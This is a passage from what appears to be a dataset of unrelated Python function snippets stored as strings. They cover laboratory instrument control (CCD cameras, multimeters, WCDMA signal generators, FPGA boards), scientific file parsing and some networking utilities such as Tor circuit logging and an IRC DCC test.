self.fpga.send_function(0, 
self.seq.get_function(0))\n\n time.sleep(0.1)\n\n #now is the time to the backsubstrate voltage (elsewhere)\n print(\"CCD start-up sequence complete on REB, ready for Back Substrate.\")", "def _add_control_channel(self, attrs):\n _cable_data = {}\n _cable_data[\"crate\"] = self._crate\n _cable_data[\"module\"] = self._module\n _cable_data[\"channel\"] = int(attrs.get('number', \"\"))\n _cable_data[\"name\"] = str(attrs.get('name', \"\"))\n self._data.append(_cable_data)", "def control_change(self, channel, cc, value):\n knob, bank = self.decode_mpd218_cc(cc)\n log.debug(\"Winch control change %d on knob %d bank %d\", cc, knob, bank)\n\n if knob == 1: # Knob #1 on MPD218, use to control resonant frequency\n #self.frequency = 0.05 + 0.1 * value\n self.frequency = 5.00\n self.set_freq_damping()\n\n elif knob == 2: # Knob #2 on on MPD218, use to control damping ratio\n #self.damping_ratio = 0.05 + 0.01 * value\n self.damping_ratio = 1.32\n self.set_freq_damping()", "def get_cdelt_dcflag(hd):\n cdelt = None\n if 'CDELT1' in hd:\n cdelt1 = hd['CDELT1']\n elif 'CD1_1' in hd:\n cdelt1 = hd['CD1_1'] # SDSS style\n\n dc_flag = 0\n if 'DC-FLAG' in hd:\n dc_flag = hd['DC-FLAG']\n elif cdelt1 < 1e-4:\n import warnings\n warnings.warn('WARNING: CDELT1 < 1e-4, Assuming log wavelength scale')\n dc_flag = 1\n\n return cdelt1, dc_flag", "def _get_cbase(self):\n from PSCalib.CalibParsBasePnccdV1 import CalibParsBasePnccdV1\n return CalibParsBasePnccdV1()", "def __cnc(cls, sens_mv, we_c):\n if we_c is None:\n return None\n\n cnc = we_c / (sens_mv / 1000.0)\n\n # print(\"A4Datum__cnc: we_c:%s cnc:%f\" % (we_c, cnc), file=sys.stderr)\n\n return cnc", "def _write_coft(parameters):\n # Format\n fmt = block_to_format[\"COFT\"]\n fmt = str2format(fmt[5])\n\n values = [x for x in parameters[\"connection_history\"]]\n out = write_record(values, fmt, multi=True)\n\n return out", "def connect_dmm2110():\n address = 'USB0::0x05E6::0x2110::8010814::INSTR'\n rm = visa.ResourceManager()\n return rm.open_resource(address)", "def setCSPadConfigurationFromOpenFile( self, h5file, dsname, event=0 ):\n if gm.CSpad2x2ElementIsInTheName(dsname) :\n print 'getCSpadConfiguration(...): This is a CSpad2x2Element. 
Special configuration is not required'\n self.isCSPad2x2 = True\n return\n\n self.h5file = h5file\n self.quadNumsInEvent = self.getQuadNumsInEvent( dsname, event )\n self.indPairsInQuads = self.getIndPairsInQuads( dsname )\n #self.printCSPadConfigPars()", "def d1out():\n\tsetState(\"D1\", \"-DI-PHDGN-01:CON\", CON_OUT)", "def read_s_and_c(self):\n speed = self._previous_speed\n cadence = self._previous_cadence\n for conn, svc in zip(self.cyc_connections, self.cyc_services):\n if not conn.connected:\n speed = cadence = 0\n continue\n values = svc.measurement_values\n if not values:\n if self._cadence_failed >= 3 or self._speed_failed >= 3:\n if self._cadence_failed > 3:\n cadence = 0\n if self._speed_failed > 3:\n speed = 0\n continue\n if not values.last_wheel_event_time:\n continue\n speed = self._compute_speed(values, speed)\n if not values.last_crank_event_time:\n continue\n cadence = self._compute_cadence(values, cadence)\n\n if speed:\n speed = str(speed)[:8]\n if cadence:\n cadence = str(cadence)[:8]\n\n return speed, cadence", "def _process_cdc(self):\n if self.load_type in [LoadType.CDC, LoadType.Full_Load_And_CDC]:\n output_location_for_cdc = os.path.join(self.output_location,\n \"cdc\")\n if not os.path.exists(self.output_location):\n os.mkdir(self.output_location)\n if not os.path.exists(output_location_for_cdc):\n os.mkdir(output_location_for_cdc)\n cdc_init_params = {\n \"output_folder_location\": output_location_for_cdc,\n \"connection_string\": self.connection_string,\n \"table_names\": self.table_names,\n }\n cdc_process = multiprocessing.Process(\n target=PostgresOperator._run_cdc_process,\n args=(self.cdc_plugin_name, cdc_init_params))\n cdc_process.name = \"siirto_cdc_\" + str(uuid.uuid4())\n cdc_process.start()\n return cdc_process\n return None", "def hsdpa_physical_downlink_settings(self):\r\r\n\r\r\n config_list = []\r\r\n\r\r\n config_list.append (\"\")\r\r\n\r\r\n config_list.append ( \"%-24s %-18s\" % (\"Channel( Carrier 1)\", \"Level\"))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"==================\", \"=====\"))\r\r\n\r\r\n pcpich_level = -10.2\r\r\n self.set_pcpich_code_level(carrier=1, leveldB=pcpich_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"P-CPICH\", pcpich_level))\r\r\n\r\r\n psch_level = -15.2\r\r\n ssch_level = psch_level\r\r\n pccpch_level = -12.2\r\r\n self.write('CONFigure:WCDMa:SIGN:DL:LEVel:PSCH %s' %psch_level)\r\r\n self.write('CONFigure:WCDMa:SIGN:DL:LEVel:SSCH %s' %ssch_level)\r\r\n self.write('CONFigure:WCDMa:SIGN:DL:LEVel:PCCPch %s' %pccpch_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"P-SCH\", psch_level))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"S-SCH\", ssch_level))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"P-CCPCH\", pccpch_level))\r\r\n\r\r\n\r\r\n # SCCPH power level and channelisation code\r\r\n sccpch_level = -12.2\r\r\n self.set_dl_chan_code_level(dl_chan='SCCPch', code=2, level_dB=sccpch_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"S-CCPCH\", sccpch_level))\r\r\n\r\r\n # PICH power level and channelisation code\r\r\n pich_level = -15.2\r\r\n self.set_dl_chan_code_level(dl_chan='PICH', code=2, level_dB=pich_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"PICH\", pich_level))\r\r\n\r\r\n # AICH power level and channelisation code\r\r\n aich_level = -15.2\r\r\n self.set_dl_chan_code_level(dl_chan='AICH', code=3, level_dB=aich_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"AICH\", aich_level))\r\r\n\r\r\n # DPCH power and channelisation code\r\r\n dpch_level = -18.2\r\r\n 
self.set_dl_chan_code_level(dl_chan='DPCH', code=3, level_dB=dpch_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"DPCH\", dpch_level))\r\r\n\r\r\n # F-DPCH power and channelisation ocde\r\r\n fdpch_level = -18.2\r\r\n self.set_dl_chan_code_level(dl_chan='FDPCh', code=6, level_dB=fdpch_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"F-DPCH\", fdpch_level))\r\r\n\r\r\n # DPCH enhanced settings\r\r\n self.configure_enhanced_dl_dpch()\r\r\n\r\r\n\r\r\n # *****************************************************************************\r\r\n # Configure 2 HS-SCCH: level, channelization code, UE ID and dummy UE ID\r\r\n # *****************************************************************************\r\r\n hssch_level_1 = -20.2\r\r\n hssch_level_2 = -20.2\r\r\n self.set_hssch_level(hssch_num=1, carrier=1, leveldB=hssch_level_1)\r\r\n self.set_hssch_level(hssch_num=2, carrier=1, leveldB=hssch_level_2)\r\r\n self.set_hssch_code(hssch_num=1, carrier=1, codeNum=2)\r\r\n self.set_hssch_code(hssch_num=2, carrier=1, codeNum=7)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"HS-SCCH #1\", hssch_level_1))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"HS-SCCH #2\", hssch_level_2))\r\r\n\r\r\n self.set_default_ue_id_hssch(carrier=1)\r\r\n\r\r\n # HS-PDSCH Enhanced Settings\r\r\n self.set_hsdsch_mpo(carrier=1, control=\"AUTO\", pwrOffsetManual=\"\")\r\r\n # unscheduled frame type for HSDPA\r\r\n # possible types are 'DUMMy', 'DTX'\r\r\n self.hsdsch_unsched_frames(carrier=1, usFrameType='DUMMY')\r\r\n\r\r\n # *****************************************************************************\r\r\n # Configure HS-PDSCH: level and first channelization code number\r\r\n # *****************************************************************************\r\r\n\r\r\n hsdsch_level = -1.2\r\r\n self.set_hsdsch_level(carrier=1, leveldB = hsdsch_level)\r\r\n self.set_hsdsch_chanelisation_code(code=1, carrier=1)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"HS-PDSCH\", hsdsch_level))\r\r\n\r\r\n\r\r\n # // *****************************************************************************\r\r\n # Set level and channelization code of E-AGCH, E-HICH and E-RGCH.\r\r\n # *****************************************************************************\r\r\n eagch_level = -20.2\r\r\n ehich_level = -20.2\r\r\n ergch_level = -20.2\r\r\n self.set_dl_chan_code_level(dl_chan='EAGCh', code=3, level_dB=eagch_level)\r\r\n self.set_dl_chan_code_level(dl_chan='EHICh', code=6, level_dB=ehich_level)\r\r\n self.set_dl_chan_code_level(dl_chan='ERGCh', code=6, level_dB=ergch_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"E-AGCH\", eagch_level))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"E-HICH\", ehich_level))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"E-RGCH\", ergch_level))\r\r\n\r\r\n config_list.append (\"\")\r\r\n\r\r\n for line in config_list:\r\r\n print line\r\r\n\r\r\n if self.dc_hsdpa:\r\r\n\r\r\n self.hsdpa_physical_downlink_settings_carrier2()", "def open_device(self):\n\t\t# open device\n\t\t# declare ctype variables\n\t\thdwf = c_int()\n\n\t\tprint \"\\nOpening device\"\n\t\tdwf.FDwfDeviceOpen(c_int(-1), byref(hdwf))\n\n\t\tif hdwf.value == 0:\n\t\t\tprint \"failed to open device\"\n\t\t\tquit()\n\n\t\tself.interface_handler = hdwf\n\n\t\thzSysIn = c_double()\n\t\t#max_buffer_size_in = c_int()\n\n\t\tdwf.FDwfDigitalInInternalClockInfo(self.interface_handler, byref(hzSysIn))\n\t\t#dwf.FDwfDigitalInBufferSizeInfo(self.interface_handler, byref(max_buffer_size_in))\n\n\t\tself.internal_clock_freq = 
hzSysIn.value\n\n\t\t#print \"internal digital in frequency is \" + str(hzSysIn.value)\n\t\t#print \"digital in max buffer size: \" + str(max_buffer_size_in.value)", "def d1in():\n\tsetState(\"D1\", \"-DI-PHDGN-01:CON\", CON_IN)", "def circ_status_event(self, c):\r\n output = [c.event_name, str(c.circ_id), c.status]\r\n if c.path: output.append(\",\".join(c.path))\r\n if c.reason: output.append(\"REASON=\" + c.reason)\r\n if c.remote_reason: output.append(\"REMOTE_REASON=\" + c.remote_reason)\r\n plog(\"DEBUG\", \" \".join(output))\r\n \r\n # Circuits we don't control get built by Tor\r\n if c.circ_id not in self.circuits:\r\n plog(\"DEBUG\", \"Ignoring circuit \" + str(c.circ_id) + \r\n \" (controlled by Tor)\")\r\n return\r\n \r\n # EXTENDED\r\n if c.status == \"EXTENDED\":\r\n # Compute elapsed time\r\n extend_time = c.arrived_at-self.circuits[c.circ_id].last_extended_at\r\n self.circuits[c.circ_id].extend_times.append(extend_time)\r\n plog(\"INFO\", \"Circuit \" + str(c.circ_id) + \" extended in \" + \r\n str(extend_time) + \" sec\")\r\n self.circuits[c.circ_id].last_extended_at = c.arrived_at\r\n \r\n # FAILED & CLOSED\r\n elif c.status == \"FAILED\" or c.status == \"CLOSED\":\r\n PathBuilder.circ_status_event(self, c)\r\n # Check if there are enough circs\r\n self.check_circuit_pool()\r\n return\r\n # BUILT\r\n elif c.status == \"BUILT\":\r\n PathBuilder.circ_status_event(self, c)\r\n # Compute duration by summing up extend_times\r\n circ = self.circuits[c.circ_id]\r\n duration = reduce(lambda x, y: x+y, circ.extend_times, 0.0)\r\n plog(\"INFO\", \"Circuit \" + str(c.circ_id) + \" needed \" + \r\n str(duration) + \" seconds to be built\")\r\n # Save the duration to the circuit for later use\r\n circ.setup_duration = duration\r\n \r\n # OTHER?\r\n else:\r\n # If this was e.g. 
a LAUNCHED\r\n pass", "def circuit(self):\n return jet.Circuit(num_wires=4, dim=2)", "def hsdpa_physical_downlink_settings_carrier2(self):\r\r\n carrier = 2\r\r\n\r\r\n config_list = []\r\r\n\r\r\n config_list.append ( \"%-24s %-18s\" % (\"Channel( Carrier 2)\", \"Level\"))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"==================\", \"=====\"))\r\r\n\r\r\n pcpich_level = -11\r\r\n self.set_pcpich_code_level(carrier=carrier, leveldB=pcpich_level)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"P-CPICH\", pcpich_level))\r\r\n\r\r\n\r\r\n # *****************************************************************************\r\r\n # Configure 2 HS-SCCH: level, channelization code, UE ID and dummy UE ID\r\r\n # *****************************************************************************\r\r\n hssch_level_1 = -18.0\r\r\n hssch_level_2 = -18.0\r\r\n self.set_hssch_level(hssch_num=1, carrier=carrier, leveldB=hssch_level_1)\r\r\n self.set_hssch_level(hssch_num=2, carrier=carrier, leveldB=hssch_level_2)\r\r\n self.set_hssch_code(hssch_num=1, carrier=carrier, codeNum=2)\r\r\n self.set_hssch_code(hssch_num=2, carrier=carrier, codeNum=7)\r\r\n\r\r\n config_list.append ( \"%-24s %-18s\" % (\"HS-SCCH #1\", hssch_level_1))\r\r\n config_list.append ( \"%-24s %-18s\" % (\"HS-SCCH #2\", hssch_level_2))\r\r\n\r\r\n self.set_default_ue_id_hssch(carrier=carrier)\r\r\n\r\r\n # HS-PDSCH Enhanced Settings\r\r\n self.set_hsdsch_mpo(carrier=carrier, control=\"AUTO\", pwrOffsetManual=\"\")\r\r\n self.hsdsch_unsched_frames(carrier=carrier, usFrameType='DUMMY')\r\r\n\r\r\n # *****************************************************************************\r\r\n # Configure HS-PDSCH: level and first channelization code number\r\r\n # *****************************************************************************\r\r\n hsdsch_level = -1.6\r\r\n self.set_hsdsch_level(carrier=carrier, leveldB = hsdsch_level)\r\r\n self.set_hsdsch_chanelisation_code(carrier=carrier, code=1)\r\r\n config_list.append ( \"%-24s %-18s\" % (\"HS-PDSCH\", hsdsch_level))\r\r\n\r\r\n config_list.append (\"\")\r\r\n\r\r\n for line in config_list:\r\r\n print line", "def csc():\n endcaps = [1,2]\n disks = [1,2,3,4]\n rings = {1:[1,2,3], # different rings for different disks\n 2:[1,2], \n 3:[1,2],\n 4:[1,2]}\n\n csc_info = {\n \"endcaps\":endcaps,\n \"disks\": disks,\n \"rings\": rings}\n\n return csc_info", "def have_cdc() -> bool:", "def ocpc(self):\n return self._ocpc", "def setParams(commandList):\n\n for i in commandList:\n # set the bin mode (1x1 or 2x2)\n if 'bin=' in i:\n try:\n bin = int(i.replace('bin=',''))\n if bin >= 1 and bin <= 2:\n ccd_bin[0].value = bin\n ccd_bin[1].value = bin\n indiclient.sendNewNumber(ccd_bin)\n response = 'OK: Bin mode set to '+str(bin)+'x'+str(bin)\n else:\n response = 'BAD: Invalid Bin Mode'\n except ValueError:\n response = 'BAD: Invalid Bin Mode'\n\n # turn the cooler on/off\n elif 'cooler=' in i:\n cooler = i.replace('cooler=','')\n\n if cooler.lower() == 'on':\n ccd_cooler[0].s=PyIndi.ISS_ON # the \"COOLER_ON\" switch\n ccd_cooler[1].s=PyIndi.ISS_OFF # the \"COOLER_OFF\" switch\n indiclient.sendNewSwitch(ccd_cooler)\n response = 'OK: Cooler turned '+cooler\n elif cooler.lower() == 'off':\n ccd_cooler[0].s=PyIndi.ISS_OFF # the \"COOLER_ON\" switch\n ccd_cooler[1].s=PyIndi.ISS_ON # the \"COOLER_OFF\" switch\n indiclient.sendNewSwitch(ccd_cooler)\n response = 'OK: Cooler turned '+cooler\n else:\n response = 'BAD: Invalid cooler set'\n \n # set the temperature setpoint (-40C - 0C)\n elif 'temp=' in i:\n try:\n 
temp = float(i.replace('temp=',''))\n if temp >= -40 and temp <= 0:\n response = 'OK: Setting temperature setpoint to '+str(temp)\n ccd_temp[0].value = temp\n indiclient.sendNewNumber(ccd_temp)\n else:\n response = 'BAD: Invalid temperature setpoint'\n except ValueError:\n response = 'BAD: Invalid temperature setpoint'\n \n # set the image output directory\n elif 'fileDir=' in i:\n try:\n global imgNum\n global imgName\n global fileDir\n tempFileDir = i.replace('fileDir=','')\n\n if tempFileDir[0] == '~':\n tempFileDir = os.path.expanduser('~')+tempFileDir[1:]\n \n if tempFileDir[len(tempFileDir)-1] != '/':\n tempFileDir = tempFileDir+'/'\n\n if not os.path.exists(tempFileDir):\n os.makedirs(tempFileDir)\n \n imgNum, imgName = last_image(tempFileDir)\n fileDir = tempFileDir\n response = 'OK: File directory set to '+fileDir\n #run_image_display(fileDir)\n\n except FileNotFoundError:\n response = 'BAD: Directory does not exist'\n\n # set the temperature setpoint (-40C - 0C)\n elif 'frameType=' in i:\n try:\n frameType = i.replace('frameType=','')\n if frameType.lower() == 'light':\n ccd_frame[0].s = PyIndi.ISS_ON\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n response = 'OK: CCD frame type set to '+frameType\n elif frameType.lower() == 'bias':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_ON\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n response = 'OK: CCD frame type set to '+frameType\n elif frameType.lower() == 'dark':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_ON\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n response = 'OK: CCD frame type set to '+frameType\n elif frameType.lower() == 'flat':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_ON \n indiclient.sendNewSwitch(ccd_frame)\n response = 'OK: CCD frame type set to '+frameType\n else:\n response = 'BAD: Invalid frame type'\n except ValueError:\n response = 'BAD: Invalid frame type'\n\n else:\n response = 'BAD: Invalid Set'+'\\n'+response\n\n return response", "def connect_dmm2100():\n address = 'USB0::0x05E6::0x2100::1416380::INSTR'\n rm = visa.ResourceManager()\n return rm.open_resource(address)", "def get_cdc_data (connection, primary_tablename, primary_val_name,\n join_tablenames=[],\n join_ons=[],\n join_val_names=[]):\n\n # build query\n sql_query = 'SELECT {0}.*'.format (primary_tablename)\n for t, name in izip (join_tablenames, join_val_names):\n sql_query += ', {0}.\"Value\" AS {1}'.format (t, name)\n sql_query += ' FROM {0}'.format (primary_tablename)\n for t, join in izip (join_tablenames, join_ons):\n sql_query += ' LEFT JOIN {0} ON {1}.{2}={0}.{3}'.format (\n t, primary_tablename, join[0], join[1])\n sql_query += ';'\n # print (sql_query)\n data = pd.read_sql_query(sql_query, con, index_col='index')\n\n # Standardize FIPS label\n data = data.rename (columns={\n 'cnty_fips': 'FIPS', 'Value': primary_val_name\n })\n data['FIPS'] = data['FIPS'].apply (lambda x: str(x).zfill (5))\n\n # Make -1's nan's (CDC data not available values)\n data.where (data != -1, other=np.nan, inplace=True)\n return (data)", "def GetChannelDescription(vDataSet,aIndexC):\r\n\r\n s = \"\"\r\n if aIndexC >= 0 and aIndexC < vDataSet.GetSizeC():\r\n s = vDataSet.GetChannelDescription(aIndexC)\r\n\r\n return s", 
"def ccdtemp(n=2):\n temp = camera.GetTemperature()\n camera.status.update()\n mesg, f1, f2, f3, f4 = camera.GetTemperatureStatus()\n print \"Sensor Temp=%6.1f, TargetTemp=%6.1f, AmbientTemp=%6.1f, CoolerVolts=%6.2f\" % (f1,f2,f3,f4)\n return temp", "def computeConeActivity(Analysis, ImageData, rec_field, cpd, _meta,\n _brownian=True, glasses=False):\n Rec_Field = (rec_field[540]['fft'] / rec_field['max']) \n \n ImageData['fitLaw'] = ImageData['powerlaw'](cpd[1:])\n powerlaw = ImageData['fitLaw']\n\n if _brownian: \n temp = np.arange(1, 80)\n movement_filter = brownian_motion(cpd[1:], temp)\n powerlaw *= movement_filter\n\n # compute the diffraction limited case seperately\n diffract = {}\n diff, _x = o.diffraction(_meta['samples'], \n _meta['pupil_size'],\n 16.6, \n ref_index=1.4, \n wavelength=550.0)\n # now interpolate mtf into cpd's of analysis:\n mtf = np.interp(cpd, _x, diff)\n\n # remove zeros to avoid errors in future computations:\n ind = np.where(mtf != 0)[0]\n diffract['cpd'] = cpd[ind]\n diffract['mtf'] = mtf[ind]\n\n diffract['preCone'] = (powerlaw[ind] * \n diffract['mtf'][ind])\n diffract['retina'] = (diffract['preCone'] *\n Rec_Field[ind])\n\n if glasses:\n # if glasses on, compute effect after diffraction case\n powerlaw *= gauss(cpd[1:], 10)\n\n for key in Analysis:\n # find cone fft:\n wv = Analysis[key]['wavelength']\n Rec_Field = (rec_field[wv]['fft'] / rec_field['max'])\n\n # generate MTFs for each condition:\n intensity = traceEye(\n Analysis[key]['dist'], \n Analysis[key]['off_axis'], \n Analysis[key]['pupil_size'], \n Analysis[key]['focus'],\n Analysis[key]['wavelength'])\n psf = o.genPSF(intensity, _meta['samples'])[1]\n Analysis[key]['mtf'] = o.genMTF(psf)[ind]\n\n Analysis[key]['preCone'] = (powerlaw[ind] * \n Analysis[key]['mtf'])\n\n Analysis[key]['retina'] = (Analysis[key]['preCone'] *\n Rec_Field[ind])\n\n return Analysis, diffract", "def do_c(self, line):\n return ODBCUtility.do_c(self, line)", "def circuitSat(C):", "def __init__(self, config_file='DAC.yaml', variables={}):\n\n self.channels = {}\n self._n_channels = 0\n self._n_markers = 0\n\n # Timing information\n self._sample_rate = 1e9\n self._seq_length = 0\n\n # waveform SD objects\n self._wave_sds = []\n\n # Instantiate and connect cards\n # get cards and sort by chassis and slot\n self.cards = []\n self.cards = [x for x in get_cards() if x.type == 'DAC']\n self.cards = sorted(self.cards, key=lambda x: x.chassis)\n self.cards = sorted(self.cards, key=lambda x: x.slot)\n\n # connect to cards\n self._connect()\n\n super().__init__(config_file, variables)\n\n qtrl._DAC = self", "def test_ctcpQuery_DCC(self):\n self.client.ctcpQuery_DCC(self.user, self.channel, \"data\")\n self.assertEqual(\n self.client.methods,\n [\n (\n \"ctcpMakeReply\",\n (\"Wolf\", [(\"ERRMSG\", \"DCC data :Unknown DCC type 'DATA'\")]),\n )\n ],\n )", "def con(self, bsfile, sn=None):\n\n self.usb = NAE.NAEUSB()\n self.usb.con(idProduct=[0xACE5], serial_number=sn)\n self._llint = LLINT.PhyWhispererUSB(self.usb)\n\n with open(bsfile,\"rb\") as bitstream:\n self._llint.FPGAProgram(bitstream) \n\n # for cw.target()\n self.usart = USART(self.usb)\n self._cwusb = self.usb", "def start_calibration(self):\n self.socket.send_string('C')\n return self.socket.recv_string()", "def performOpen(self, options={}):\n \n self.establish_connection() \n self.setModel(self.model_number)\n\n self.log(self.model_number, level = 30)\n \n self.switch_id_lsb_map = {'A': 0, 'B': 1, 'C': 2, 'D': 3,\n 'E': 4, 'F': 5, 'G': 6, 'H': 7}\n #except Exception as 
e:\n #msg = str(e)\n #raise InstrumentDriver.CommunicationError(msg)", "def C(width = 1, size = (10, 20), layer = 0):\n D = Device(name = 'C')\n w = width/2\n s1, s2 = size\n points = [(-w, -w), (s1, -w), (s1, w), (w, w), (w, s2-w),\n (s1, s2-w), (s1, s2+w), (-w, s2+w), (-w, -w)]\n D.add_polygon(points, layer = layer)\n D.add_port(name = 1, midpoint = (s1, s2), width = width, orientation = 0)\n D.add_port(name = 2, midpoint = (s1, 0), width = width, orientation = 0)\n return D", "def openCif(self, filename):\r\n cf = CifFile.ReadCif(filename)\r\n \r\n #Assuming all data is in one outer block like NIST examples:\r\n data = cf[cf.keys()[0]]\r\n \r\n #Create a Crystollographic Unit Cell\r\n a = data['_cell_length_a']\r\n b = data['_cell_length_b']\r\n c = data['_cell_length_c']\r\n \r\n alpha = data['_cell_angle_alpha']\r\n gamma = data['_cell_angle_gamma']\r\n beta = data['_cell_angle_beta']\r\n \r\n spaceGroupInt = int(data['_symmetry_Int_Tables_number'])\r\n spaceGroup = SpaceGroups.GetSpaceGroup(spaceGroupInt)\r\n \r\n unitcell = Cell(spaceGroup, 0,0,0, a, b, c, alpha, gamma, beta)\r\n \r\n atomLabels = data['_atom_site_label']\r\n atomSymbol = data['_atom_site_type_symbol']\r\n xPositions = data['_atom_site_fract_x']\r\n yPositions = data['_atom_site_fract_y']\r\n zPositions = data['_atom_site_fract_z']\r\n \r\n atoms = [] #for the cell window\r\n for i in range(len(atomLabels)):\r\n #unitcell.generateAtoms((float(xPositions[i]), float(yPositions[i]), float(zPositions[i])), atomLabels[i])\n\r\n aData = [atomLabels[i], 0, float(xPositions[i]), float(yPositions[i]), float(zPositions[i])]\r\n #--Added to atomData: single ion anisotropy, spin magnitude, valence\r\n aData.append(0.0)#Dx\r\n aData.append(0.0)#Dy\r\n aData.append(0.0)#Dz\r\n aData.append(1)#Spin Magnitude\r\n aData.append('')#valence\r\n #-------------------------------------------------------------------\r\n atoms.append(aData)\r\n \r\n self.atomTable.SetValue(i, 0, atomLabels[i])\r\n self.atomTable.SetValue(i, 2, xPositions[i])\r\n self.atomTable.SetValue(i, 3, yPositions[i])\r\n self.atomTable.SetValue(i, 4, zPositions[i])\r\n \r\n #Create a Magnetic Cell\r\n self.MagCell = MagneticCell(unitcell, 1,1,1, spaceGroup)\r\n\r\n\r\n Na = 1 #Cif files only contain 1 unit cell\r\n Nb = 1\r\n Nc = 1\r\n \r\n #self.cellChange(spaceGroupInt, a, b, c, alpha, beta, gamma, magNa = Na, magNb = Nb, magNc = Nc, cutNa = Na, cutNb = Nb, cutNc = Nc, atomData = atoms)\n self.updateCell(spaceGroupInt, a, b, c, alpha, beta, gamma, magNa = Na, magNb = Nb, magNc = Nc, cutNa = Na, cutNb = Nb, cutNc = Nc, atomData = atoms)\n self.refreshGUI()\n \n \r\n #send signal to the cell window to show the info that has been loaded and to vtkWindow to draw it\r\n n = self.atomTable.GetNumberRows()\r\n for i in range(n):\r\n print self.atomTable.GetValue(i, 0)\r\n send(signal = \"File Load\", sender = \"Session\", spaceGroup = spaceGroupInt, a = a, b = b, c = c, alpha = alpha, beta = beta, gamma = gamma, magNa = Na, magNb = Nb, magNc = Nc, cutNa = Na, cutNb = Nb, cutNc = Nc)", "def __init__(self, state, cval=True, conditional=\"eq\"):\n self.variable = state\n self.cval = cval\n self.conditional = conditional\n self.sending = bridgectl.sending\n self.type = bridgectl.type\n self.target = bridgectl.target", "def func_Ic_318(cp, cd):\n return cp/(np.pi*(cd/2)**2)", "def control_c(self) -> None:\n time.sleep(0.1) # sometimes it's better to wait a bit\n send_control_c(self.proc, True)", "def update_interface(self, cd):\n # Creating a self.cd so that other methods can 
access it\n self.cd = cd\n self.inhale_time_val.setText(f\"{self.cd['inhale_duration']:.1f} s\")\n self.exhale_time_val.setText(f\"{self.cd['exhale_duration']:.1f} s\")\n self.IE_ratio_val.setText(f\"1:{self.cd['IE_ratio']:.1f}\")\n self.peak_pressure_val.setText(f\"{self.cd['peak_pressure']:.2f} cmH2O\")\n self.tidal_volume_val.setText(f\"{self.cd['tidal_volume']:.0f} ml\")\n self.tidal_volume_val.setText(f\"{self.cd['tidal_volume']:.0f} ml\")", "def COM(fp):\n length = unpack('>H', fp.read(2))[0]\n comment = unpack('{}s'.format(length - 2), fp.read(length - 2))[0]\n\n info = {\n 'Lc' : length,\n 'Cm' : comment\n }\n\n return info", "def cd(self):\n self._pad.cd()", "def dicom_cli():", "def c(self):\r\n return self.__c", "def get_switch(self, conf, dpid):\n\t\tpass", "def get_spectrum(self):\n\n self.sock.send('Q')\n self.sock.send(str(100 * self.center_wl))\n\n response = self.sock.recv(7)\n if not response:\n raise InstrumentError(\n 'No response from Labview client, try reconnecting')\n\n datalen = int(response)\n data = ''\n\n while datalen > 0:\n # read data in chunks\n dt = self.sock.recv(datalen)\n data += dt\n datalen -= len(dt)\n\n data = data.split(\"\\n\")[:-1]\n for i in range(len(data)):\n data[i] = data[i].split(\"\\t\")\n\n data = n.array(data,dtype=float)\n\n wl = data[0]\n ccd = data[1:]\n\n return wl,ccd\n\n #self.sock.close()", "def enable_cl1_direct(self):\n self.write_versa5(0x17,0x02) ## Change top multiplier to 0x22\n self.write_versa5(0x18,0x20)\n self.write_versa5(0x10,0xc0) ## Enable xtal and clock\n self.write_versa5(0x13,0x03) ## Switch to clock\n self.write_versa5(0x10,0x44) ## Enable clock input only and refmode\n self.write_versa5(0x21,0x0c) ## Use previous channel, direct input, may have skew", "def command(self):\n saw_error = False\n try:\n analog_gain = float(self.value_analog.get())\n except:\n print(\"analog must be floating point value\")\n self.value_analog.set(str(self.tcp_comms.tcp_params.analog_gain_target))\n saw_error = True\n try:\n digital_gain = float(self.value_digital.get())\n except:\n print(\"digital must be floating point value\")\n self.value_digital.set(str(self.tcp_comms.tcp_params.digital_gain_target))\n saw_error = True\n try:\n analog_tol = float(self.value_analog_tol.get())\n except:\n print(\"analog tol must be floating point value\")\n self.value_analog_tol.set(str(self.tcp_comms.tcp_params.analog_gain_tol))\n saw_error = True\n try:\n digital_tol = float(self.value_digital_tol.get())\n except:\n print(\"digital tol must be floating point value\")\n self.value_digital_tol.set(str(self.tcp_comms.tcp_params.digital_gain_tol))\n saw_error = True\n if not saw_error:\n self.tcp_comms.tcp_params.analog_gain_target = analog_gain\n self.tcp_comms.tcp_params.digital_gain_target = digital_gain\n self.tcp_comms.tcp_params.analog_gain_tol = analog_tol\n self.tcp_comms.tcp_params.digital_gain_tol = digital_tol\n self.tcp_comms.send_freeze_exposure(analog_gain, analog_tol, digital_gain, digital_tol)", "def __init__(self, devtype, device):\n #\n self.Type = devtype # SERIAL, FILE, other? \n self.Device = device # ELM327, other? 
